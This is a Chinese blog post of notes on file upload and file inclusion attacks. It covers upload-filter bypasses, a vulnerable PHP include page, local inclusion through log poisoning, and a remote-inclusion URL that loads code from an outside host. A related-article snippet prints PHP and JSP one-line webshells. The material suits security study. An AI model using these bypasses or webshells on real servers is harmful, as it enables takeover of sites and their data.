文件上传与文件包含

最新推荐文章于 2024-06-13 17:59:16 发布
最新推荐文章于 2024-06-13 17:59:16 发布
阅读量2.2k 收藏 3
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/109046499
版权

文件上传漏洞:指用户上传了一个可执行的脚本文件,并通过该脚本文件获得了执行服务器端命令的能力。

文件头欺骗漏洞:
在一句话木马前面加上GIF89a 然后将木马保存为图片格式,例如Lin.jpg 、Lin.gif
如果对大小有要求就复制多几次
文件头欺骗可以绕过简单的waf

Filepath漏洞
可以用来突破自动命名规则(通过BurpSuite抓包修改)

  1. 改变上传后的路径/a.asp/,需要一定权限,不一定能创建成功,成功创建后为/a.asp/Lin.gif
    在这里插入图片描述

  2. 直接改变文件名称/a.asp;.修改后为/a.asp;.Lin.gif,最后命名为a.asp

%00截断
1.上传图片木马通过BurpSuite抓包,修改文件名称,点击hex 找到空格20改为00
在这里插入图片描述

最后的上传的文件名为c.php
2.上传图片,直接修改图片内容content-type:改为text/plain 下面的内容删掉改为一句话木马

表单提交按钮不存在
有些页面没有提交按钮,通过F12修改前端代码,将<input type=”submit”value=”提交”name=”aa”>写入表单,

文件包含漏洞:严格来说,文件包含漏洞属于‘代码注入‘,原理是注入一段用户能控制的脚本或代码,并让服务端执行。文件包含可能出现在PHP,JSP,ASP,等语言中。
常见的导致文件包含的函数如下:
PHP:include(),include_once(),require(),require_once(),fopen(),readfile()…
JSP/Servlet:ava.io.File(),java.io.FileReader(),…
ASP:include file,include virtual,

PHP的文件包含函数
Include() require() include_once() require_once() 当使用这4个函数包含一个新文件时,该文件将被当作php代码执行,php内核不会去理会这个文件的类型

<?php $test=$GET[‘c’]; Include($test); ?>

保存为include.php,在同一目录下创建test.txt 内容为<?php phpinfo()?>
访问测试 www.xxxx.com/test/include.php?c=test.txt
访问连接时就会将test.txt传给c,执行phpinfo()

文件包含漏洞利用的条件
1.include()等函数通过动态变量的方式引入需要包含的文件
2.用户能控制该动态变量

本地文件包含漏洞利用技巧

  1. 包含用户上传的文件 用户上传的文件内容中含有php代码,那这些代码被include()加载后会被执行
  2. 包含data:// 或者php://input 等伪协议
  3. 包含Session文件
  4. 包含日志文件,比如Web Server的access log。通过构造语句让服务器报错并将一句话随报错信息写入日志,找到日志文件,通过包含漏洞将日志文件包含,执行一句话后用菜刀连接后拿下网站

远程文件包含
如果php得配置选项allow_url_include为on,则include/require函数时可以加载远程文件的,这种漏洞被称为远程文件包含漏洞(RFI)
代码:

<?php $test=$_GET[‘c’]; Include($test); ?>保存为include.php

执行时就把攻击站点的文件包含到目标站点就行
www.xxx.com/test/include.php?c=www.asd.com/113.txt

Lin冲啊
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dvwa中的文件包含文件上传
qq_45653152的博客
05-21 809
文件包含文件上传 文件包含:程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含文件包含实验前必须将我们的PHP.ini中的allow_url_fopen和allow_url_include打开,即开启远程读取和本地包含。 Low等级: 查看源代码,从源码中可以看出,服务器对参数page并没有做任何的过滤操作 服务器期望用进行的操作是点击file1.php、file2.php、file3.php三个文件,服务器包含这三
web安全文件上传文件包含漏洞解析
vivlol918的博客
05-14 1198
文件上传漏洞是指攻击者通过页面上传图片、文件等途径,将恶意脚本等文件上传到服务器上,从而控制服务器,实现攻击目的。
文件上传文件包含和目路遍历杂谈
gaily123的博客
01-11 702
访问到的是vlun.php对应的html文件,/etc/passwd的内容被插入在该html文件中显示。如果“其他文件”可以是本地文件(本机上的文件)那就是本地文件包含漏洞,如果“其他文件”可以远程文件(其他机器上的文件)那就是远程文件包含漏洞。
PTE笔记:文件上传文件包含
最新发布
小月肖的博客
06-13 790
PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。2)黑名单过滤,不允许上传php、xx等,这时候,上传一个图片码,用bp抓包,在repeater中修改后缀为php3、php4、php5、phtml等;1)白名单过滤,只允许上传xx,这时候就做一个图片码,将图片码上传上去,用bp抓包,在repeater中修改后缀,然后发送,再去浏览器查看。针对../过滤-->双写..././-->..\。
文件包含漏洞和上传漏洞
sunnygao的博客
09-29 3141
文章目录文件包含漏洞PHP文件包含漏洞远程文件包含漏洞截断包含JSP文件包含文件包含漏洞预防文件上传漏洞解析漏洞服务端检测目录验证文件内容检测预防方法一句话木马 sql注入,有sql盲注,基于布尔的注入,还有基于时间的注入,union的使用条件 字段数保持一致,可以用其他数据凑数补上。 文件包含漏洞 PHP文件包含漏洞 ​ 文件包含:共用函数写到单个文件中,然后多次调用, ​ 文件包含漏洞:包含的文件可以被替换成恶意文件。 PHP提供了四个文件包含函数,分别是include() 找不到被包含的文件只会产生警
文件上传文件包含
枫梓林のBlog
05-02 1293
文件上传文件包含 文章目录文件上传文件包含0x01 基于 DVWA 的 low 级别演示文件上传漏洞1.文件上传漏洞简介2.使用蚁剑连接 webshell.php0x02 基于DVWA的Medium级别演示文件上传漏洞1.截取上传文件的 HTTP 请求进行修改提交2.使用蚁剑连接0x03 实战-基于 DVWA 的 High 级别演示文件上传漏洞1.上传测试2.文件包含漏洞3.制作简单的图片木马进行上传绕过3.1 MIME 类型3.2 上传文件3.3 以文件包含漏洞来执行图片中的 php代码0x04 总结
文件上传漏洞类型汇总(详细)
彼岸花苏陌的博客
11-10 5714
文件上传漏洞类型汇总 1.无限制: (1)直接用1.php放一句话木马上传 2.绕过前端: (1)Javascript绕过: 浏览器设置中选择禁用javascript即可 (2)抓包修改: burpsuite抓包后修改filename 3.绕过服务端: (1)黑名单绕过: 例如:不允许php,jsp文件上传,则使用1.php3,1.php5等上传 (2)白名单绕过: 例如:允许图片只允许jpg,则抓包改后缀改php为jpg (3)MIME绕过: MIME通过通过检查http包的Conte
网络安全-实验八-文件上传文件包含.docx
11-10
在网络安全领域,文件上传文件包含是两个常见的漏洞类型,它们都与Web应用程序的安全性密切相关。这个实验主要通过DVWA(Damn Vulnerable Web Application)这个开源的脆弱Web应用平台,模拟了真实的攻击场景,以...
PHP实现文件上传与下载实例与总结
12-18
3. `post_max_size`: 设置POST数据总大小,包括文件上传和其他POST数据。 4. `max_file_uploads`: 允许一次上传的最大文件数。 这些配置可以根据服务器资源和应用需求进行适当调整。 总的来说,PHP文件上传与下载...
java Springboot实现多文件上传功能
08-27
在上面的代码中,我们首先使用 layui 的 upload 组件来实现文件上传的界面,包括文件选择、文件列表、上传按钮等。然后,我们使用 layui 的 upload.render 方法来渲染文件上传的界面,并且配置文件上传的参数,例如...
VB上传本地文件到服务器
01-03
6. **modFileUpdate.bas和Form1.frm**:这两个文件可能是VB工程的一部分,`modFileUpdate.bas`可能包含与文件上传相关的模块代码,而`Form1.frm`则可能是一个包含用户界面元素(如OpenFileDialog按钮)的窗体文件。...
Java文件上传与文件下载实现方法详解
08-26
Java文件上传与文件下载实现方法详解 Java文件上传与文件下载实现方法详解是Java开发中一个非常重要的知识点,该方法可以实现客户端向服务器端上传文件和下载文件,本文将详细介绍Java文件上传与文件下载实现方法的...
网络安全,上传漏洞——文件解析漏洞
dzqxwzoe的博客
03-14 209
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。上传xx.jpg的一句话木马文件,通过抓包工具将文件名改为xx.php jpg(请注意php与jpg之间有一个空格),然后再通过16进制编辑将“20”改为“00”(空格的16进制为20)。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
文件包含+文件上传
frutrue的博客
06-12 1253
文件包含+文件上传
文件上传,包含,读取
2301_77315080的博客
09-05 166
成因:服务器对用户上传的文件的处理存在安全问题危害:1.上传 HTML 等文件,被恶意 SEO 、广告利用2.利用文件处理机制进行 Dos 攻击3.可被用于钓鱼、诈骗4.可被用于存储木马等恶意攻击文件;5.可与文件包含等其他漏洞结合提高危害。
WEB-文件包含、文件读取、文件上传
yufengly1984的专栏
07-29 421
一、利用php伪协议 php://input php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data。 php://filter协议 协议语法: php://filter:/= php://filter 的 参数列表 read     读取 write     写入 resource ...
CTF之web学习记录 -- 文件包含
热门推荐
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
文件上传漏洞小总结
whoim_i的博客
10-28 3382
一、什么是文件上传漏洞 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 造成文件上传漏洞...
文件上传文件包含漏洞
m0_51313985的博客
03-30 760
day2 什么是文件上传文件上传指用户在相应的权限下上传正常的图片或者文件内容。 什么是文件上传漏洞? 简单来说,文件上传漏洞指用户超过其权限,绕过限制上传了不允许上传的内容,这里上传的文件可以是木马、病毒、恶意脚本或者webshell等 最常见的一个webshell就是php一句话木马: <?php @eval($_POST[1]); ?> jsp: <%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
dvwa文件上传文件包含
06-09
好的,针对您的问题,我可以给您一些基本的介绍。 DVWA是一个用于进行Web应用程序漏洞测试的开源平台。其中包含多个漏洞类型,其中包括文件上传漏洞和文件包含漏洞。 文件上传漏洞是指攻击者可以通过Web应用程序上传恶意文件,从而控制服务器或者向服务器发送恶意代码。这可能会导致服务器的完全失控,严重危害服务器的安全文件包含漏洞则是指攻击者可以通过Web应用程序包含其他文件,从而读取和执行服务器上的敏感文件。这可能会导致服务器上的重要信息泄露,严重危害服务器的安全。 为了防止这些漏洞的发生,应该对Web应用程序进行充分的安全性测试,并且在开发Web应用程序时采取必要的安全性措施,从而保障服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值